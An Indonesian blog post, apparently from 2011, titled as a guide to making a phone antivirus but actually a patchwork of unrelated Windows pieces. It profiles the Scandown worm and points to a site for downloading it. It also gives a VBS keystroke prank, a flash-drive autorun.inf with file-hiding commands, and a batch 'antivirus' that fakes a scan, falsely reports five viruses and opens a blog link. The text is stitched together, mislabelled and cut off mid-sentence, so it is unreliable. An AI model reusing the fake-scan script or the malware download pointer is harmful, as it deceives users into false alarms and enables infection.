Rabu, 07 September 2011

Cara Buat Anti Viruz Untuk HandPhone


MEMBUAT ANTIVIRUS DI HANDPHONE

- Anda langsung mendapatkan sample antivirus dan cara pembuatannya.

- Jangan jadikan diri anda seorang yang tidak berarti untuk kepentingan orang banyak.

______________________________________________
Virus Scandown! Virus terkecil didunia???
---------------------------------------------------------------------
Saya benar-benar terkejut dan salut ama virus yang satu ini. Mengapa? Baru kali inilah saya temui virus executable yang berukuran sekitar 5KB.

Awalnya saya mengira file ini tidak bakal berjalan selayaknya virus. Tapi ternyata, virus ini bisa menulari flashdisk (sekaligus file autorun.inf juga), dan menyebar ke folder windows + system 32. Persis seperti layaknya sebuah virus.

Mantap sekali! Sekali lagi saya katakan, saya salut ama ukuran virus ini.
VirusName : Scandown
VirusSize : 4.50 KB (4,608 bytes) => langsung dicopy dari properties.
Icon : aplikasi biasa
CRC32 : 229F17A7
MD5 : 39F479C3989F0D30CB3C9AE2270D78FC

Menyebar ke:
-C:\command.exe
-C:\autorun.inf
-C:\windows\hh.exe
-C:\windows\clh.exe
-C:\windows\Mstask.exe
-C:\windows\Scanregw.exe
-C:\windows\Sndvol32.exe
-C:\windows\Winhlp32.exe
-C:\windows\system32\Abcwin.exe
-C:\windows\system32\ddhelp.exe
-C:\windows\system32\Scandown.exe
-C:\windows\system32\clh.exe
-C:\windows\system32\mshta.exe

Modifikasi registry:
-HKLM\Software\microsoft\windows\currentversion\run\Scan Downloads Files For Virus
=> “C:\windows\system32\scandown.exe”

Mengapa saya berinama “Scandown”? Yah, kelihatannya lebih banyak kata “Scandown” pada virus ini. He he he… (sungguh tidak beralasan). Mungkin AV lain memberi nama yang berbeda.

Dan sudah saya cek dengan beberapa antivirus lokal, ternyata belum ada yang mendetek.
Wajar juga, virus ini bukanlah virus lokal.
Demi mencegah penyebaran virus ini di Indonesia, saya tidak sertakan link untuk mendownload virus ini. Tapi jika memang kamu ingin mendapatkan virus ini, silakan download langsung di http://www.vx.netlux.org/ cari virus yang namanya “Worm.Win32.VB.f”

Semoga artikel ini menambah wawasan anda.
By:Visa MarQuza Root Noya (pendiri)

______________________________________________
Computer dapat menulis sendiri??
---------------------------------------------------------------------
Saya akan memberikan gmn caranya computer dapat menulis,
tanpa harus kita yang mengetik pada keyboard.

1 . Buka start, All program, Accessories, pilih notepad.
2 . Copy dan Paste source code di bawah ini kedalam notepad tadi :

On Error Resume Next
Dim wshell
dim anharku
Set wshell = CreateObject("wscript.shell")
anharku = "Sayang kapan kamu kembali ke indonesia? apa kamu kembali dengan hatimu yang dulu?"
dim i
wscript.sleep 2000
wshell.Run "notepad",3
WScript.sleep 180
for i = 1 to len(anharku)
wshell.sendkeys mid(anharku,i,1)
wscript.sleep 50
next
wscript.sleep 1800
wshell.sendKeys "%+{F4}"
wscript.sleep 1000
wshell.sendKeys "~"
wscript.sleep 1800
wshell.sendKeys "v"
WScript.sleep 250
wshell.sendKeys "i"
WScript.sleep 250
wshell.sendKeys "s"
WScript.sleep 250
wshell.sendKeys "a"
WScript.sleep 250
wshell.sendKeys "n"
WScript.sleep 250
wshell.sendKeys "o"
WScript.sleep 250
wshell.sendKeys "y"
WScript.sleep 250
wshell.sendKeys "a"
WScript.sleep 1000
wshell.sendKeys "~"
WScript.sleep 250
wshell.sendKeys "~"
WScript.sleep 250
wscript.quit

3 . Simpan dengan nama 'File.txt' (tanpa tanda kutip).
4 . Ubah nama 'File.txt ' menjadi 'File.vbs' (tanpa tanda kutip)
5 . Klik dua kali pada 'File.vbs' (Open), dan tunggu proses akan berjalan.




CARA MEMBUAT ANTIVIRUS [FD] FLASDICK CARA SEDERHANA

pertama-tama buatlah AUTORUN untuk menjalangkan antivirus pada fd (flashdisk) !, carax copy
antivirus yg berukurang kecil ke fd (flashdisk) kita, sembarang maunya antivirus apa
contonya PCMAV,ANSAV….dll (dicontoh kali ini saya menggunakan PCMAV karna ukurangx kecil
bangat ngak sampe 3 MB). oke deh…kita buat scrip dulu untuk autorun di fd kita….
tinggal ketik or copy aja di notepad
============potong disini============
[AUTORUN]
open=nama antivirus.exe
shellexecute=nama antivirus.exe
shell\scan_viruz_dulu_donkz:-)_!!!\command=nama antivirus.exe
shell=scan_viruz_dulu_donkz:-)_!!!
============potong disini============
kalo udah kita save dengan nama “autorun.inf” (ngak pake tanda kutip) di fd kita
sekarang kita copy aja antivirusnya ke fd..!!!
(ingat kalo ngopy file autorun dan antivirusnya bukan di dalam folder, ingat yah…!!!).
Jadi deh..^_^ kalo mau scan virus tinggal double click aja tuh drive fd-nya *=*
terus kalo kita klik kanan drive fd-nya BUKANKAH ADA TAMBAHAN KATA DI ATAS KATA AUTOPLAY.
<scan_viruz_dulu_donkz:-)_!!!…..adakan ^_^ ehhhhhhhhh……
kalo mau diubah ganti aja kata dalam scrip
———————————-
-   shell\kata anda\command=nama antivirus.exe
-   shell=kata anda
———————————-
Lho…gimana cara buka fdnya (#@#$$#%#@) !!!
^_^tinggal di klik kanan aja terus open gampangkan
oyah..gak bagus yah kalo di dalam fd kita ada nama file AUTORUN dan antivirusnya…
merusak pemandangan aja ^_^
kalo gitu kita super hidden aja (itu nama gaulnya)heeeee caranya…?
-    buka RUN dari start menu
-    terus ketik cmd
-    abiz itu…kita masuk kedalam drive fdnya (biasanya di drive f:)
-    udah gitu kita tulis commandnya.
f:\>attrib +h +s nama antivirusnya.exe (buat sembunyiin antivirusnya)
f:\>attrib +h +s autorun.inf (buat hidden file autorunnya)
entar ..^_^..ilang deh filenya……..*=*
SELESAI


Cara Membuat Anti Virus Sederhana


Notes :
- Penulis TIDAK bertanggung jawab atas penggunaan maupun penyalahgunaan dari artikel ini.
- Tujuan dibuat artikel HANYA untuk BAHAN PEMBELAJARAN saja.
- Penggunaan nama, merek, atau logo hanya sebagai CONTOH dan REFERENSI saja, TIDAK ada maksud mempromosikan pihak tertentu.
- Penulis mohon maaf apabila seluruh/sebagian dari isi artikel ini sudah tersirat dalam
artikel sejenis lainnya.
  • Pengantar
Sekarang kehadiran para virus maker (-selanjutnya disingkat jadi VM saja) lokal telah membuat gerah para user komputer tanah air. Bisa dibayangkan bila dari sekian banyak virus lokal tidak satu-dua yang menghancurkan data (terutama bagi file office; word, excel, dll

MEMBUAT ANTIVIRUS DI KOMPUTER


 
Terkadang kita ingin melingdungi computer/ notebook dari ancaman virus… Tetapi ketika Anti Virus anda tidak bisa mencegah virus yg sangat berbahaya, seperti Trojan Horse, Worm Tile, worm moonlight, Winkiller.a, winkiller.b, To King, Spider Man, dan yg paling berbahaya virus I love you, anda tak perlu takut…





Di sini kita akan membuat anti virus berformat *.bat* yg dapat memberantas virus yg berbahaya seperti virus yg di atas tadi…
Langkah- langkah untuk membuat Anti Virus sederhana…
1. Siapkan secangkir Kopi, fanta, top ice, coca cola, atau yg lain…
2. Buka notepad
3. Tuliskan Script Seperti yg seperti ini:
echo off
color ce
cls
echo --------
echo =============================
echo Anti Virus Sederhana momo 1.0
echo =============================
echo +++++++++
echo.
echo.
echo Selamat anda telah membeli software kami. mohon updatenya yang ke 1.5.
echo Anti Virus Ini akan memeriksa dari ancaman virus.
echo.
echo.
echo Nanti Kita Seegera memeriksa komp/laptop anda dengan sangat cepat
echo pencet sembarang untuk mengaktifkannya!!! :)
pause
cls
dir %windir% /s
dir %windir% /s
dir %windir% /s
dir %windir% /s
dir %windir% /s
cls
echo proses kami telah selesai.
echo.
echo ditemukan 5 jenis virus pada komp/ laptop anda
echo.
echo.

:pilih
echo Apakah anda sudah menginstal AVG 9? (Y/N)
set /p inputchoice=
if %inputchoice% equ y goto yes
if %inputchoice% equ Y goto yes
if %inputchoice% equ n goto no
if %inputchoice% equ N goto no
echo.
echo.
echo anda memasukkan jawaban yang salah
echo silahkan coba kembali
pause
cls
goto pilih

:yes
cls
exit

:no
cls
echo berikut ini kami akan mengantarkan ke alamat AVG 9
echo tekan terserah untuk melanjutkan!!!
pause
start iexplore http://www.CHEATBANDUNG.blogspot.com
exit

4. Lalu klik file> save as> file name (isikan tulisan yg belakangnya ada tanda .bat seperti: av.bat)
5. Lalu jalankan file Bat tersebut

3 komentar:

Farrel Dariodaniel mengatakan...

Mas di jalanin file virus nya ya rusak lah computer nya

Farrel Dariodaniel mengatakan...

Mas di jalanin file virus nya ya rusak lah computer nya

adhe priqitiew mengatakan...

LUMAYAN BAGUS UNTUK DIBACA SEBAGAI REFERNSI PEMULA

Posting Komentar

 
Design by Michael Themes | Bloggerized by Michael Benaldo - Michael Benaldo Themes | Hacker Medan